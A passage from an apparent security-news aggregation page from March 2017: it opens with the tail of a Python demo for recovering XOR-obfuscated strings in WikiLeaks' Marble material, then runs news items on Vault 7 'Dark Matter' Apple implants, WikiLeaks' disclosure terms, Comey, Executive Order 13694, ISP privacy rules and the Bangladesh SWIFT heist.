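    """Coarse writing-system bucket by code point (enough for this demo)."""
    cp = ord(ch)
    if cp < 0x0250:
        return "Latin"
    if 0x0400 <= cp <= 0x04FF:
        return "Cyrillic"
    if 0x0600 <= cp <= 0x06FF:
        return "Arabic"  # Farsi is written in Arabic script
    if 0x4E00 <= cp <= 0x9FFF:
        return "CJK"
    if 0xAC00 <= cp <= 0xD7AF:
        return "Hangul"
    return "Other"


def scripts_in(text: str) -> set:
    """Writing systems used by the alphabetic characters of a string."""
    return {script_of(c) for c in text if c.isalpha()}


def looks_like_text(s: str) -> bool:
    """Reject junk: require printable text, at least 6 chars, mostly letters/spaces."""
    if len(s) < 6 or not s.isprintable():
        return False
    wordish = sum(c.isalpha() or c.isspace() for c in s)
    return wordish / len(s) >= 0.8


def find_hidden_strings(blob: bytes) -> list:
    """Scan every offset for a record; return (offset, key, text, scripts) tuples."""
    found, i = [], 0
    while i + 2 <= len(blob):
        key, length = blob[i], blob[i + 1]
        body = blob[i + 2:i + 2 + length]
        if key and length and len(body) == length:
            try:
                text = bytes(b ^ key for b in body).decode("utf-8")
            except UnicodeDecodeError:
                text = ""  # wrong key or not a record: invalid UTF-8
            if text and looks_like_text(text):
                found.append((i, key, text, scripts_in(text)))
                i += 2 + length  # skip past the accepted record body
                continue
        i += 1
    return found


# Constructed sample: one English string, two non-English decoys of the kind
# WikiLeaks says Marble's test data contains, and a fake error message.
SAMPLE_STRINGS = [
    ("connect to update server", 0x37),
    ("Ошибка подключения", 0x5C),          # Russian decoy: "connection error"
    ("无法连接到更新服务器", 0xA3),          # Chinese decoy: "cannot connect to update server"
    ("Error: the update service denied access", 0x11),
]


def build_sample_blob() -> bytes:
    """Embed the sample records between runs of zero bytes (constructed filler)."""
    filler = b"\x00" * 8
    blob = filler
    for text, key in SAMPLE_STRINGS:
        blob += obfuscate(text, key) + filler
    return blob


if __name__ == "__main__":
    for off, key, text, scripts in find_hidden_strings(build_sample_blob()):
        print(f"offset {off:3d} key 0x{key:02x} {sorted(scripts)}: {text}")
```

The script buckets are reported so that the caveat WikiLeaks raises stays explicit: a recovered Cyrillic or CJK string shows what the author planted, not where the author is from, so language artefacts are a weak signal on their own and should be weighed together with infrastructure, timing and code-reuse evidence.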

WikiLeaks has offered to share the exploits it has obtained with tech firms, but many companies have not agreed to the organization’s conditions. U.S. officials also hinted that using the leaked information could have legal repercussions.

While the available information has led to the discovery of some zero-day vulnerabilities, cybersecurity vendors and other tech companies determined that many of the flaws have already been patched. Last week, WikiLeaks published files focusing on Mac and iPhone exploits, but Apple claimed most of the security holes had been addressed.

The CIA has refused to comment on the authenticity of the leaked documents. However, the agency pointed out that its mission is to collect intelligence from overseas entities, and claimed that it does not spy on individuals in the U.S.


FBI Chief's Secret Twitter Account Outed?

31.3.2017 securityweek BigBrothers
When Federal Bureau of Investigation Director James Comey teased that he had joined the world of social media with secret Facebook and Twitter accounts, tech writer Ashley Feinberg took the dare.

After four hours of FBI-level sleuthing, she was pretty sure she had the answer: On both he was using the name of US Protestant theologian Reinhold Niebuhr. Embarrassing: He had only one Twitter follower.

All it took, Feinberg said on the Gizmodo website where she is a senior reporter, was for Comey to tell an audience of security professionals Wednesday night that he had very cautiously joined the social networking age to keep up with family.

"I care deeply about privacy, treasure it. I have an Instagram account with nine followers. Nobody is getting in. They're all immediate relatives, and one daughter's serious boyfriend," Comey let slip.

Feinberg was piqued. "Who am I to say no to a challenge?" she wrote. She tracked down Comey's family members, eventually discovering his son Brien's Instagram account by way of a photo of him with an Instagram tag.

That led to a potential dead end: A protected account which she could not view.

But when she asked to be invited by Brien Comey to view his account, Instagram popped up with offers to follow other accounts that included Brien's mother and a mysterious "Reinhold Niebuhr," who had just nine followers.

And a Google check easily showed that Niebuhr was the subject of James Comey's 1982 university thesis.

The FBI chief, who carries the mammoth political burden of investigating the Trump administration's suspected links to Russia as both political parties eye him suspiciously, unsurprisingly also had a protected account.

But from there to Twitter was easy. Feinberg found seven Niebuhrs there, but only one with a secretive identity: @projectexile7. That was the name of a program to battle gun-related crime that Comey helped develop.

That account had no tweets in three years, and followed only 27 other accounts. But those were reporters who cover the FBI, and law enforcement-related accounts. And Donald Trump.

And the one follower was a prominent expert in national security law and a friend of Comey's. Bingo.

So much for secrecy. The FBI had no comment late Thursday, but the Twitter-verse was convinced. Hours after Feinberg's report, Comey had more than 8,000 followers. Pretty good for never tweeting.


President Donald Trump is going to extend by one year the Executive Order 13694
31.3.2017 securityaffairs BigBrothers

US President Trump is extending by one year special powers introduced by President Obama with the Executive Order 13694 on cyber security.
US President Donald Trump intends to extend by one year Executive Order 13694, which gives the US Government special powers to issue sanctions against people and organizations engaged in significant cyberattacks and cybercrime against the U.S.

Executive Order 13694 was introduced by former President Barack Obama on April 1, 2015, and was due to expire next Saturday. President Trump sent a letter to Congress yesterday informing it of his decision to keep the Order active.

“Significant malicious cyber-enabled activities originating from, or directed by persons located, in whole or in substantial part, outside the United States, continue to pose an unusual and extraordinary threat to the national security, foreign policy, and economy of the United States,” Trump wrote in the letter. “Therefore, I have determined that it is necessary to continue the national emergency declared in Executive Order 13694 with respect to significant malicious cyber-enabled activities.”

The executive order gave the U.S. new powers to retaliate for hacking against the critical infrastructure, political institutions, and US organizations.

Due to the attacks on the 2016 Presidential election, the US Government expanded the executive order in December 2016 to include voting systems and US political parties.

In December, the Order was used to sanction Russian agents and organizations for their alleged role in the cyber attacks on the Presidential Election.

The US ejected 35 Russian intelligence operatives from the United States and imposed sanctions on nine entities and individuals.

The Russian individuals ejected by the US Government were working out of Russia’s consulate in San Francisco and the Russian embassy in Washington.

According to a White House fact sheet issued on the executive order, the individuals were ejected in response to the “harassment of our diplomatic personnel in Russia by security personnel and police.”


The US Government sanctioned the Russian intelligence services, the GRU (Russian Main Intelligence Directorate) and the FSB (Federal Security Service), four GRU officers, and three other organizations. The actions are the Obama administration’s response to a Russian hacking and disinformation campaign used to interfere in the American election process.

The order was issued concurrently with a report from US intelligence confirming that the cyber attacks against the 2015 Presidential election aimed to influence the results of the vote.

The decision to extend the existing executive order is one of the first actions the Trump Administration has taken to approach cyber security issues.

One of the measures explicitly requested in the order is close collaboration between the Department of Commerce and the Department of Defense aimed at the protection of critical infrastructure.


US Senate Just Voted to Let ISPs Sell Your Web Browsing Data Without Permission
24.3.2017 thehackernews BigBrothers
The ISPs can now sell certain sensitive data like your browsing history without permission, thanks to the US Senate.
The US Senate on Wednesday voted, with 50 Republicans for it and 48 Democrats against, to roll back a set of broadband privacy regulations passed by the Federal Communication Commission (FCC) last year when it was under Democratic leadership.
In October, the Federal Communications Commission ruled that ISPs would need to get consumers' explicit consent before being allowed to sell their web browsing data to the advertisers or other big data companies.
Before the new rules could take effect on March 2, President Trump's newly appointed FCC chairman Ajit Pai temporarily put a hold on them.
Pai argued that the rules, which mirror the FTC's regulatory approach, unfairly favored companies like Google, Twitter, and Facebook, which have the ability to collect more data than ISPs and thus dominate digital advertising.
"All actors in the online space should be subject to the same rules, and the federal government shouldn’t favor one set of companies over another," FCC said in a statement.
"Therefore, he has advocated returning to a technology-neutral privacy framework for the online world and harmonizing the FCC’s privacy rules for broadband providers with the FTC’s standards for others in the digital economy."
Pai wanted the FCC and the FTC to treat all online entities the same way, so in his view the new privacy policies should be scrapped.
If the latest decision is approved by the House of Representatives and signed by President Trump, it will make it easier for ISPs like Verizon, Comcast, and AT&T to earn more money by collecting and selling data on what you buy, where you browse, and what you search for from your home, all without your consent.
Since the Senate used the Congressional Review Act (CRA) to overturn the privacy rules, if the repeal is passed, it would not only roll back the FCC's privacy rules but also prevent the regulatory body from making similar privacy regulations in the future if the.
Not surprisingly, the broadband industry applauded the FCC's move, calling it "a welcome recognition that consumers benefit most when privacy protections are consistently applied throughout the Internet ecosystem."
But, of course, privacy advocates are not at all happy with the voting, arguing that the Senate has put ISPs profits over users’ privacy.


US blames North Korea for the $81 million Bangladesh cyber heist
24.3.2017 securityaffairs BigBrothers

US federal prosecutors suspect the involvement of North Korea in the cyber heist of $81 million from Bangladesh’s account at the New York Federal Reserve Bank.
The news was reported by The Wall Street Journal: prosecutors suspect the involvement of Chinese middlemen who helped the Government of Pyongyang organize the cyber theft.

In February 2016, unknown hackers transferred the funds from the Bangladesh’s account at the New York Federal Reserve Bank to accounts in the Philippines through the SWIFT system.

In reality, the hackers attempted to steal much more: they tried to complete dozens of transfers for an overall amount of $850 million.

The disaster was avoided partly by accident, because the bank’s security systems and typos in some requests allowed the identification of the theft attempts; investigators discovered that the hackers failed in 35 transfer attempts.

“$81 million was transferred from the Federal Reserve Bank to Filipino accounts while attempts to claim $850 million were foiled by the Federal Reserve Bank’s security system,” Razee Hassan, deputy governor of Bangladesh Bank, told AFP.

“Attempts to transfer money to Sri Lanka by the hackers were foiled as their transfer requests contained typos,” he added.

The hackers exploited gaps in communication between banks at weekends: the operation started on a Friday, when the Bangladesh Bank is closed, and on the following days, Saturday and Sunday, the Fed Bank in New York was closed.


The choice of the Philippines as the landing country for the bank transfers was not accidental: banks there were also closed on the Monday due to the Chinese New Year.

A top police investigator in Dhaka told Reuters in December that some Bangladesh Bank officials deliberately exposed its computer systems, allowing hackers to penetrate them.

The Justice Department and the New York Fed declined to comment on the report.

The suspicion that North Korea is behind the cyber heist is not new.

“The U.S. Federal Bureau of Investigation believes that North Korea is responsible for the heist, an official briefed on the probe told Reuters. Richard Ledgett, deputy director of the U.S. National Security Agency, publicly suggested on Tuesday that North Korea may be linked to the incident, while private firms have long pointed the finger at the reclusive state.” reported the Reuters Agency.

Security experts at Symantec linked the attacks against banks worldwide to the Lazarus APT group which is believed to be a nation state actor.

In June 2016, evidence collected by a senior security researcher from Anomali Labs linked the malware to the North Korean hacker crew known as Lazarus Group.

The expert discovered five additional strains of malware that suggested the involvement of the Lazarus Group in the cyber attacks that targeted the banks.

The researchers at Symantec discovered that the hacking tools used by the gang share many similarities with the malicious code in the arsenal of the Lazarus APT.

The activity of the Lazarus Group surged in 2014 and 2015; its members used mostly custom-tailored malware in their attacks, and experts who investigated the crew consider it highly sophisticated.

“Symantec has found evidence that a bank in the Philippines has also been attacked by the group that stole US$81 million from the Bangladesh central bank and attempted to steal over $1 million from the Tien Phong Bank in Vietnam.” reads the analysis published by Symantec last year.

The experts at Symantec have spotted at least three strains of malware, Backdoor.Fimlis, Backdoor.Fimlis.B, and Backdoor.Contopee, which have been used in targeted attacks against financial institutions.

“Symantec has identified three pieces of malware which were being used in limited targeted attacks against the financial industry in South-East Asia: Backdoor.Fimlis, Backdoor.Fimlis.B, and Backdoor.Contopee,” states Symantec. “At first, it was unclear what the motivation behind these attacks were, however code sharing between Trojan.Banswift (used in the Bangladesh attack used to manipulate SWIFT transactions) and early variants of Backdoor.Contopee provided a connection.”

The expert Aaron Shelmire from Anomali Labs supported this thesis with his investigation.

“Five new additional pieces of malware code discovered that contain unique portions of code related to the SWIFT attacks. ” wrote Shelmire.

The Anomali Labs team conducted deeper research into a very large malware data repository, using a set of Yara signatures to search for the shared subroutines.


The experts discovered five additional pieces of malware containing portions of code shared by Lazarus Group’s strains of malware, including the one used in the several SWIFT attacks, according to Shelmire.

Last week, SWIFT announced it planned to cut off the remaining North Korean banks still connected to its system, amid concerns about the North Korean nuclear program and the missile tests conducted by Pyongyang.

The U.S. Treasury is considering sanctions against the alleged Chinese middlemen who facilitated the cyber heist.

The New York Fed and SWIFT declined to comment.


Vault7 Dark Matter batch – CIA has been targeting the iPhone supply chain since at least 2008
24.3.2017 securityaffairs BigBrothers

Wikileaks released the second batch of the CIA’s Vault 7 dump; it contains more valuable documents for understanding how the CIA was hacking systems worldwide.
The Wikileaks Vault 7 dump will make headlines for a long time. The organization has just released another lot of classified documents related to the hacking tools, techniques and exploit code used by CIA cyber spies to hack Apple MacBook and iOS devices.

Wikileaks dubbed this batch of information as ‘Dark Matter,’ it includes five documents on Mac and iPhone hacks developed by the CIA.


This is the second batch of Vault 7 released by WikiLeaks, after the whistleblower organization released the first one on March 7.

The hacking tools and techniques were devised by a CIA unit called the Embedded Development Branch (EDB).

“Today, March 23rd 2017, WikiLeaks releases Vault 7 ‘Dark Matter’, which contains documentation for several CIA projects that infect Apple Mac Computer firmware (meaning the infection persists even if the operating system is re-installed) developed by the CIA’s Embedded Development Branch (EDB). These documents explain the techniques used by CIA to gain ‘persistence’ on Apple Mac devices, including Macs and iPhones and demonstrate their use of EFI/UEFI and firmware malware.” reads the Dark Matter description provided by Wikileaks.

The CIA experts found a way to infect Apple firmware to gain persistence; in this way the attackers were able to maintain the infection on Mac OS and iOS devices even if the operating system was re-installed.

According to WikiLeaks, one of the most interesting documents is related to the “Sonic Screwdriver” project, which is a “mechanism for executing code on peripheral devices while a Mac laptop or desktop is booting”, allowing an attacker to boot its attack software, for example from a USB stick, “even when a firmware password is enabled”.

The technique allows a local attacker to boot its hacking tool using a peripheral device (e.g. a USB stick or screwdriver), “even when a firmware password is enabled” on the device. This implies that Sonic Screwdriver allows attackers to modify the read-only memory of a device; the documents reveal that the malware is stored in the Apple Thunderbolt-to-Ethernet adapter.

Digging in the Dark Matter dump we can find the NightSkies 1.2 hacking tool, which is described as a “beacon/loader/implant tool” for the Apple iPhone.

“Also included in this release is the manual for the CIA’s “NightSkies 1.2” a “beacon/loader/implant tool” for the Apple iPhone. Noteworthy is that NightSkies had reached 1.2 by 2008, and is expressly designed to be physically installed onto factory fresh iPhones. i.e the CIA has been infecting the iPhone supply chain of its targets since at least 2008.” continues Wikileaks.

This hacking tool has expressly been designed by the CIA hackers to infect “factory fresh” iPhones, likely during transport. The existence of the tool suggests that the Central Intelligence Agency has been targeting the iPhone supply chain since at least 2008.

“While CIA assets are sometimes used to physically infect systems in the custody of a target it is likely that many CIA physical access attacks have infected the targeted organization’s supply chain including by interdicting mail orders and other shipments (opening, infecting, and resending) leaving the United States or otherwise,” says WikiLeaks.

“DarkSeaSkies” is another implant described in the Dark Matter repository. It is described as “an implant that persists in the EFI firmware of an Apple MacBook Air computer” and consists of “DarkMatter”, “SeaPea” and “NightSkies”, respectively EFI, kernel-space and user-space implants.

Wikileaks plans to release more interesting information about the CIA cyber capabilities and hacking techniques.


WikiLeaks Releases Data on CIA's Apple Hacking Tools

24.3.2017 securityweek BigBrothers

WikiLeaks has released a new round of Vault 7 files. The latest dump, dubbed “Dark Matter,” details some of the tools allegedly used by the CIA to target Apple devices.

The tools are named Sonic Screwdriver, Der Starke, Triton, DarkSeaSkies, NightSkies and SeaPea and, based on the descriptions provided in the files made available by WikiLeaks, they can be used to spy on iPhones and Mac computers. However, in most cases, deploying them requires physical access to the targeted device.

Sonic Screwdriver, for instance, is a tool that can be used to execute code from a USB thumb drive or other external disk connected to a Mac laptop even if the firmware is protected by a password. The documents obtained by WikiLeaks show that Sonic Screwdriver is stored on the firmware of a Thunderbolt-to-Ethernet adapter.

The DarkSeaSkies implant is designed for targeting the EFI on MacBook Air computers, and it’s meant to be delivered via “a supply chain intercept or a gift to the target.” DarkSeaSkies relies on the DarkMatter EFI driver for persistence and installing other tools, and the SeaPea OS X rootkit for stealth and execution of other implants. One such implant is NightSkies, which provides command and control capabilities.

The documents show DarkSeaSkies can be installed by booting the targeted system with an external flash drive. The implant is persistent across OS upgrades and reinstalls, but it can be removed by the attacker using a special command. Under certain conditions, the implant may also remove itself automatically.

Another set of tools includes a piece of OS X malware dubbed Triton, its infector Dark Mallet, and Der Starke, the EFI-persistent version of Triton.

One version of the NightSkies tool is designed for targeting iPhones. Once installed on a device, it can be used to execute arbitrary commands, download additional tools to the phone, and steal various types of files, including the address book, SMS messages and call logs. NightSkies, which also requires physical access to the targeted device, is recommended for “factory fresh” devices.

The documents are dated 2008, 2009 and 2012, but WikiLeaks claims other Vault7 files show the CIA has continued to improve these tools. The organization also pointed out that the files show the intelligence agency has been “infecting the iPhone supply chain of its targets since at least 2008.”

“While CIA assets are sometimes used to physically infect systems in the custody of a target it is likely that many CIA physical access attacks have infected the targeted organization's supply chain including by interdicting mail orders and other shipments (opening, infecting, and resending) leaving the United States or otherwise,” WikiLeaks said.

Impact of the tools and risks

The first Vault7 dump summarized the CIA’s alleged hacking capabilities, and appeared to show that the agency is capable of spying on or through a wide range of devices. While actual exploits have not been published, the information that was made public did not describe any sophisticated tools and many of the vulnerabilities had already been addressed.

In the case of the Dark Matter dump, the fact that the Apple implants require physical access to devices makes them less dangerous. Nicholas Weaver, a researcher at the International Computer Science Institute of the University of California, Berkeley, pointed out, “if somebody has physical access to your computer, you can’t call it yours anymore.”

As for WikiLeaks’ supply chain claims, Weaver and others believe the organization’s statement may be misleading.

“Installing onto ‘factory fresh’ is not about interdiction but targeted delivery: the CIA asset gives the target a phone or a MacBook, this is the general extent of the ‘supply chain’ the CIA is concerned with,” Weaver told SecurityWeek via email.

“Interdiction in the ‘supply chain’ works very well for things like routers, which are big, expensive, few in number, shipped from the US, and to known customers,” he explained. “For example, a Cisco router sent to Syria. Basically you have to know that ‘his package is being shipped from location I can control to known target’ in order to intercept and sabotage.”

Weaver continued, “It doesn’t work for something you can buy at a local store or which is drop-shipped from a local warehouse in the country where it’s going to be used from any of a gazillion different vendors. The CIA doesn’t have a fleet of agents in foreign post offices that can grab such a package. And you don’t mass-poison (say at the factory) this way, for THAT you would have to sabotage the machine that programs up all the iPhones in the first place.”

On the other hand, Weaver pointed out that the WikiLeaks files reveal some interesting information about the CIA’s human intelligence (HUMINT) capabilities.

“At least one tool was specifically because the asset could give the target a MacBook Air, indicating that the target was very trusted by the asset,” the expert said. “Likewise, the two tools together which allow one to reflash firmware even when the EFI password was set says that the CIA had a case where a paranoid target had his computer with a very low level password in the firmware, and the asset would have access to the computer for a short period of time and needed to reflash the computer.”


Exclusive: Wikileaks reveals CIA's Apple MacOS and iPhone Hacking Techniques
23.3.2017 thehackernews BigBrothers
As part of its "Vault 7" series, Wikileaks — the popular whistle-blowing platform — has just released another batch of classified documents focused on exploits and hacking techniques the Central Intelligence Agency (CIA) designed to target Apple MacOS and iOS devices.
Dubbed "Dark Matter," the leak uncovers macOS vulnerabilities and attack vectors developed by a special division of the CIA called Embedded Development Branch (EDB) – the same branch that created ‘Weeping Angel’ attack – and focused specifically on hacking Mac and iOS firmware.
CIA Developed Unremovable Mac OS and iPhone Malware
The newly released documents revealed that CIA had also been targeting the iPhone since 2008.
The Agency has created a malware that is specially designed to infect Apple firmware in a way that the infection remains active on MacOS and iOS devices even if the operating system has been re-installed.
According to Wikileaks, the released documents also give a clear insight into "the techniques used by the CIA to gain 'persistence' on Apple Mac devices, including Macs and iPhones and demonstrate their use of EFI/UEFI and firmware malware."
Project Sonic Screwdriver: Infect Devices via USB
One of the documents from 2012 reveals details about the "Sonic Screwdriver" project, which according to the CIA, is a "mechanism for executing code on peripheral devices while a Mac laptop or desktop is booting."
This technique may allow hackers to deliver malware from a peripheral device – such as a USB stick or a screwdriver – "even when a firmware password is enabled" on the device, which means the read-only memory of a device can be modified using Sonic Screwdriver.
The malware is stored in the Apple Thunderbolt-to-Ethernet adapter, claims WikiLeaks.
The NightSkies Implants: iPhone's Supply Chain Attack
Another document in the latest release consists of a manual for the CIA's "NightSkies 1.2," which is described as a "beacon/loader/implant tool" for the Apple iPhone.
What's noteworthy is that the first version of this iPhone hacking tool has been operational since 2007, and it was expressly designed to infect "factory fresh" iPhones in the supply chain.
"While CIA assets are sometimes used to physically infect systems in the custody of a target it is likely that many CIA physical access attacks have infected the targeted organization's supply chain including by interdicting mail orders and other shipments (opening, infecting, and resending) leaving the United States or otherwise," says WikiLeaks.
CIA's Dark Matter leak is the second batch of Vault 7 released by WikiLeaks, after the whistleblower organization released the first part of an unprecedentedly large archive of CIA-related classified documents on March 7.
The previously published Vault 7 leak outlined a broad range of security bugs in software and devices, including iPhones, Android phones, and Samsung TVs, which millions of people around the world rely on, used to intercept communications and spy on targets.
Expect to see more revelations about the government and intelligence agencies from WikiLeaks in the coming days as part of its Year Zero series.


US Suspects North Korea in $81 Million Bangladesh Theft: Report

23.3.2017 securityweek BigBrothers
US federal prosecutors suspect the North Korean government directed last year's theft of $81 million from Bangladesh's account at the New York Federal Reserve Bank, according to a media report Wednesday.

Citing unnamed sources, The Wall Street Journal said prosecutors were developing cases showing Chinese middlemen helped the North Korean government orchestrate the enormous theft from the Bangladesh central bank.

In February 2016, thieves transferred the funds from Bangladesh's account at the New York Fed to accounts in the Philippines using authenticated international bank access codes in the SWIFT system, not by hacking the bank.


It was unclear when or if any charges would be filed but any case might implicate North Korea without charging North Korean officials.

The Justice Department and the New York Fed declined to comment on the report.

The New York Fed over the past year has issued several statements, including joint statements with the central bank of Bangladesh and SWIFT, pledging to recover the stolen funds and enhance security of the payments system.

One statement said officials "remain concerned about this event and recommitted to working together to recover the entire proceeds of the fraud as expeditiously as possible, bring the perpetrators to justice in cooperation with law enforcement from other jurisdictions, and lend support to multilateral international efforts to further protect the global financial system from these types of attacks in the future."

However, the New York Fed did not respond to a request from AFP for comment on the status of the investigation.

Researchers at the security firm Symantec previously had linked the theft to a series of cyber-attacks on the US financial system and the 2014 hacking of Sony Pictures.


FBI's Comey: From Clinton Bugbear to Thorn in Trump's Side?

21.3.2017 securityweek BigBrothers
Eight months ago, James Comey hampered Hillary Clinton's White House bid with a damning assessment of her email practices.

On Monday, the powerful FBI chief lobbed another bombshell into the world of US politics -- this time directed at the sitting president, Donald Trump.

In a high-stakes congressional hearing followed live by millions in America and around the world, Comey flatly rejected Trump's explosive claim that he was wiretapped by his predecessor Barack Obama.

Comey delivered his assessment without a blink, telling lawmakers neither the Federal Bureau of Investigation nor the Justice Department had evidence to support such allegations.

Intensely concentrated, with furrowed brow, the towering Comey -- he stands 6'8" (two meters) tall -- took the heat during a marathon first public hearing on the issue of Russian meddling in last year's election, and Trump's unsubstantiated allegations of wiretapping.

The 56-year-old projected the cool demeanor of a veteran public official throughout the marathon hearing, during which he confirmed for the first time that his agency is investigating Russia's alleged election interference and notably Moscow's possible collusion with Trump's campaign.

But the FBI chief, who has been in his post since September 2013, is also a highly-skilled political operator, who knows his words carry weight.

The Democrat Clinton learned that the hard way, when Comey called a surprise press conference last July to deliver a dressing-down over her use of a private email server that reverberated all the way to the November polls.

Comey angered Republicans by deciding not to press charges against the former secretary of state. But Clinton, to this day, believes that Comey's public berating of her, followed by a last-minute intervention resurrecting the controversy in October, cost her the election.

When Trump decided to keep the Obama appointee in his job, it raised eyebrows from critics who saw it as a tacit reward for the part he played in damaging Clinton's chances.

But the FBI chief increasingly looks to be a thorn in the president's side.

- Straight shooter -

Comey has now set his sights on the issue of Russian election meddling, which has stalked Trump's young presidency.

And if there is one character trait the FBI chief is known for, it is tenacity.

Comey locked horns relentlessly with Silicon Valley as he sought to convince Apple to unlock a smartphone used by the perpetrator of a terror attack in California. The FBI's own experts ended up breaking into the device.

Under Obama, Comey repeatedly stole the spotlight from his boss, former attorney general Loretta Lynch, who was reduced in the Clinton case to announcing she was following his advice not to press charges.

The burning-hot Clinton investigation -- which saw Comey assailed on all sides -- did much to cement his reputation as a straight shooter, as well as thrust him into the public eye.

But Comey has been circulating in political and legal circles at the highest level for three decades, giving him the confidence to challenge the country's justice department, and even the White House.

In the wake of the 2014 fatal police shooting of unarmed black teen Michael Brown in Ferguson, Missouri, Comey raised hackles by supporting cops who were wary of fulfilling their duties, for fear of their actions being caught on video.

- Independent -

Many top US government careers begin in New York, and Comey is no exception -- he hails from the Manhattan suburbs. He cut his teeth as a federal prosecutor in New York and the Washington area.

In 2003, the father-of-five became deputy attorney general.

The following year, he faced one of his toughest showdowns, confirming his reputation for being independent and unafraid.

Comey had become acting attorney general due to the illness of his boss John Ashcroft.

At Ashcroft's bedside, the presidential counsel to George W. Bush, Alberto Gonzales, was trying to persuade him to reauthorize a controversial warrantless eavesdropping program.

Comey -- who was against extending the program -- later revealed the incident to senators, unleashing a political firestorm.


WikiLeaks will disclose CIA exploits to tech companies under specific conditions
19.3.2017 securityaffairs BigBrothers

Assange sent an email to tech firms including “a series of conditions” that they need to fulfill before gaining access to details included in the Vault 7.
A couple of weeks ago Wikileaks published the Vault 7 archive, a huge trove of files detailing CIA hacking tools and capabilities.

The files allegedly originated from a high-security network of the U.S. Central Intelligence Agency (CIA). The Vault 7 data leak sheds light on the hacking capabilities of the US intelligence agency and provides details about the spying infrastructure it used for mass surveillance.

“The first full part of the series, “Year Zero”, comprises 8,761 documents and files from an isolated, high-security network situated inside the CIA’s Center for Cyber Intelligence in Langley, Virginia,” reads the announcement issued by WikiLeaks.

“Recently, the CIA lost control of the majority of its hacking arsenal including malware, viruses, Trojans, weaponized “zero day” exploits, malware remote control systems and associated documentation.”

The Vault 7 dump includes confidential information, hacking tools, malicious codes and exploits developed to hack popular products from various IT companies, including Samsung, Apple, Google, and Microsoft.


The hacking tools in the arsenal of the CIA were developed by the CCI’s Engineering Development Group (EDG). The developers at EDG are tasked with developing and testing any kind of malicious code, including implants, backdoors, exploits, Trojans and viruses.

WikiLeaks announced it was planning to share information on the hacking tools included in the Vault7 dump with the tech companies whose products are affected even if the White House has warned that there may be legal repercussions for the organization.

The organization wants to protect the customers of the major companies whose products are affected by the hacking tools in the data leak.

WikiLeaks clarified it would not release tools or exploits “until a consensus emerges on the technical and political nature of the CIA’s program and how such ‘weapons‘ should analyze, disarmed and published.”

During a WikiLeaks press conference on March 9, 2017, Julian Assange explained that the organization decided to share information with impacted companies.

“We have decided to work with them, to give them some exclusive access to some of the technical details we have, so that fixes can be pushed out,” WikiLeaks’ founder Julian Assange said during a Facebook Live press conference last week.

What happened in the following days?

Assange contacted tech companies, including Apple, Microsoft, and Google, to explain how WikiLeaks intends to share what it knows about the vulnerabilities the CIA was allegedly exploiting.

It appears that WikiLeaks asked the tech companies to meet specific conditions first.

According to Motherboard, Assange sent an email to Apple, Google, Microsoft and other companies this week including “a series of conditions” that the tech companies need to fulfill before gaining access to the actual technical details and code of the hacking tools included in the Vault 7 archive.

“WikiLeaks included a document in the email, requesting the companies to sign off on a series of conditions before being able to receive the actual technical details to deploy patches, according to sources,” reads the blog post published by Motherboard. “It’s unclear what the conditions are, but a source mentioned a 90-day disclosure deadline, which would compel companies to commit to issuing a patch within three months.”

Sources familiar with the matter cited by Motherboard mentioned a 90-day disclosure deadline, meaning WikiLeaks would require the tech companies to issue a patch for the vulnerabilities within three months.


WikiLeaks (@wikileaks), 18 Mar 2017: “Update on CIA #Vault7 "zero day" software vulnerabilities. Ref: https://wikileaks.org/ciav7p1”

This implies additional effort for the tech firms, which could also decide not to comply with WikiLeaks’ conditions.

Of course, the best option for tech firms is to accept the conditions and fix the issues as soon as possible. At the same time, the CIA could itself pass information on the flaws to the companies, before attackers in the wild take advantage of the bugs. We cannot exclude that a foreign government is already exploiting the flaws in targeted attacks.

“WikiLeaks and the government hold all the cards here, there’s not much the tech companies can do on their own besides rabidly looking through their code to look for any issues that might be related,” one of the anonymous sources said.

The CIA declined to comment on whether it plans to alert the tech companies. According to Motherboard, a spokesperson sent a statement saying that the agency has “no comment on the authenticity of purported intelligence documents released by Wikileaks or on the status of any investigation into the source of the documents.”

“As we’ve said previously, Julian Assange is not exactly a bastion of truth and integrity,” the spokesperson wrote. “The American public should be deeply troubled by any Wikileaks disclosure designed to damage the Intelligence Community’s ability to protect America against terrorists and other adversaries. Such disclosures not only jeopardize US personnel and operations, but also equip our adversaries with tools and information to do us harm.”


WikiLeaks Won't Disclose CIA Exploits To Companies Until Certain Demands Are Met
18.3.2017 thehackernews BigBrothers

It's been over a week since Wikileaks promised to hand over more information on hacking tools and tactics of the Central Intelligence Agency (CIA) to the affected tech companies, following the leak of roughly 8,761 documents that Wikileaks claimed belonged to CIA hacking units.
"We have decided to work with them, to give them some exclusive access to some of the technical details we have, so that fixes can be pushed out," WikiLeaks' founder Julian Assange said during a Facebook Live press conference last week.
However, things are not as easy for the tech companies as they looked.
After days of waiting, Assange made his first contact with Apple, Microsoft, and Google this week and finally made his intentions clear – no sharing of the bugs and vulnerabilities the CIA is or was allegedly taking advantage of until certain demands are met.
Multiple anonymous sources familiar with the matter told Motherboard that Assange sent an email to Apple, Google, Microsoft and other companies mentioned in the Vault 7 Leak this week and instead of reporting the bugs and exploits found in the leaked CIA documents, he made some demands.
A document included in the email listed "a series of conditions" that the tech companies need to fulfill before gaining access to the actual technical details and code of the hacking tools the anti-secrecy organization has in its possession.
Although the exact conditions are still unclear, one of the sources mentioned a 90-day disclosure deadline, which would require tech companies to issue a patch for the vulnerabilities within a three-month timeframe.
It's also not clear if any of the affected tech companies plan to comply with Wikileaks' demands.
While major tech companies like Apple, Google and Microsoft said that their recent security updates had already fixed the bugs mentioned in Vault 7, they would probably need to check out what WikiLeaks has in its store to ensure proper deployment of patches.
What will happen next is entirely unclear, but since the CIA's hacking arsenal has been made public, the best option for the agency is to disclose those flaws and exploits to the affected companies itself, to protect the agency and US citizens from criminals and foreign governments alike.
"WikiLeaks and the government hold all the cards here, there's not much the tech companies can do on their own besides rabidly looking through their code to look for any issues that might be related," one of the anonymous sources said.
Vault 7 is just the beginning of WikiLeaks' Year Zero disclosure, as the group promised to release more from the government and intelligence agencies in coming weeks.


Who is spying on communications in the Washington area? A rogue state is suspected of mass surveillance
17.3.2017 securityaffairs BigBrothers

US authorities uncovered surveillance activity, allegedly run by a rogue entity, that is tracking the phones of government officials and foreign diplomats.
Something very strange has happened in the Washington, D.C., region: experts noticed an unusual amount of highly suspicious cellphone activity. The fear is that a rogue actor is attempting to spy on the communications of numerous individuals, including US government officials and foreign diplomats.

The news was reported by the Washington Free Beacon, which viewed sensitive documents regarding the issue and interviewed security insiders. The level of sophistication of the activity suggests the involvement of a foreign nation-state actor.

